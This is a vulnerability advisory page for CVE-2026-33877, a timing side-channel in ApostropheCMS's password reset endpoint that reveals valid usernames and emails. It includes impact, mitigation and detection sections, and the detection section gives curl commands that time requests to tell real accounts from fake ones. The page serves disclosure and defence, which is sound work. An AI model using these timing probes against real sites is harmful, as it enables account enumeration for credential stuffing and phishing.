CVE-2026-33877
Received Received - Intake
Timing Side-Channel Allows Account Enumeration in ApostropheCMS

Publication date: 2026-04-15

Last updated on: 2026-04-20

Assigner: GitHub, Inc.

Description
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-15
Last Modified
2026-04-20
Generated
2026-06-16
AI Q&A
2026-04-16
EPSS Evaluated
2026-06-15
NVD
CVE-2026-33877
EUVD
EUVD-2026-23015
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
apostrophecms apostrophecms to 4.29.0 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-208 Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-33877 is a timing side-channel vulnerability in the password reset endpoint of ApostropheCMS versions 4.28.0 and earlier. The vulnerability allows unauthenticated attackers to determine whether a username or email exists in the system by measuring differences in response times.

When a user is not found, the system responds after a fixed 2-second delay. However, if a valid user is found, the system performs database updates and sends an email without adding an equivalent delay. This causes the response time to differ measurably between valid and invalid users.

Because the endpoint accepts both username and email in a single query and lacks rate limiting, attackers can automate requests to enumerate valid accounts. This can be used for credential stuffing or targeted phishing attacks.

Only ApostropheCMS instances with the password reset feature explicitly enabled are affected, as it is disabled by default. The issue was fixed in version 4.29.0 by normalizing response times and adding rate limiting.

Impact Analysis

This vulnerability allows attackers to enumerate valid usernames and email addresses without authentication by exploiting timing differences in the password reset endpoint.

  • Attackers can confirm the existence of user accounts, which facilitates targeted credential stuffing attacks using known valid usernames or emails.
  • It enables targeted phishing campaigns against confirmed users by providing attackers with verified account information.
  • The lack of rate limiting on the password reset endpoint allows rapid automated probing, increasing the scale and speed of enumeration attacks.

Overall, this can lead to increased risk of account compromise and social engineering attacks.

Detection Guidance

This vulnerability can be detected by measuring the response times of the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) when submitting usernames or emails. Invalid users consistently trigger a fixed 2-second delay, while valid users cause variable response times due to database updates and email sending operations.

To detect the vulnerability, you can perform repeated POST requests to the password reset endpoint with different usernames or emails and analyze the response times. Statistically significant deviations from the fixed 2-second delay indicate valid accounts.

  • Use curl or similar tools to send POST requests with different usernames or emails to the endpoint.
  • Example command to test an invalid user (expect ~2 seconds response): curl -X POST https://your-apostrophe-instance/api/v1/@apostrophecms/login/reset-request -d '{"username":"invaliduser"}' -H 'Content-Type: application/json' -w '%{time_total}\n' -o /dev/null
  • Example command to test a potentially valid user (observe if response time differs significantly): curl -X POST https://your-apostrophe-instance/api/v1/@apostrophecms/login/reset-request -d '{"email":"[email protected]"}' -H 'Content-Type: application/json' -w '%{time_total}\n' -o /dev/null

By comparing the response times of these requests, you can identify timing discrepancies that reveal valid usernames or emails.

Mitigation Strategies

Immediate mitigation steps include:

  • Upgrade ApostropheCMS to version 4.29.0 or later, where the vulnerability is fixed.
  • If upgrading is not immediately possible, disable the password reset feature by setting the passwordReset option to false, as it is disabled by default.
  • Implement rate limiting on the password reset endpoint to prevent rapid automated enumeration attempts, since the existing throttle only applies to the login flow.
  • Ensure that the password reset endpoint normalizes response times to a constant minimum duration (e.g., 2 seconds) regardless of user existence to prevent timing side-channel leaks.
Compliance Impact

This vulnerability allows unauthenticated attackers to enumerate valid usernames and email addresses by exploiting timing differences in the password reset endpoint. Such user enumeration can facilitate targeted credential stuffing and phishing attacks, potentially leading to unauthorized access or exposure of personal data.

From a compliance perspective, this vulnerability could impact adherence to standards like GDPR and HIPAA, which require protection of personal data and user privacy. The ability to confirm valid user accounts may increase the risk of data breaches or unauthorized access, thereby undermining the confidentiality and security controls mandated by these regulations.

However, the vulnerability is rated as low severity (CVSS 3.7) and only affects instances with the password reset feature explicitly enabled. Mitigations such as normalizing response times and implementing rate limiting reduce the risk of exploitation.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-33877. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart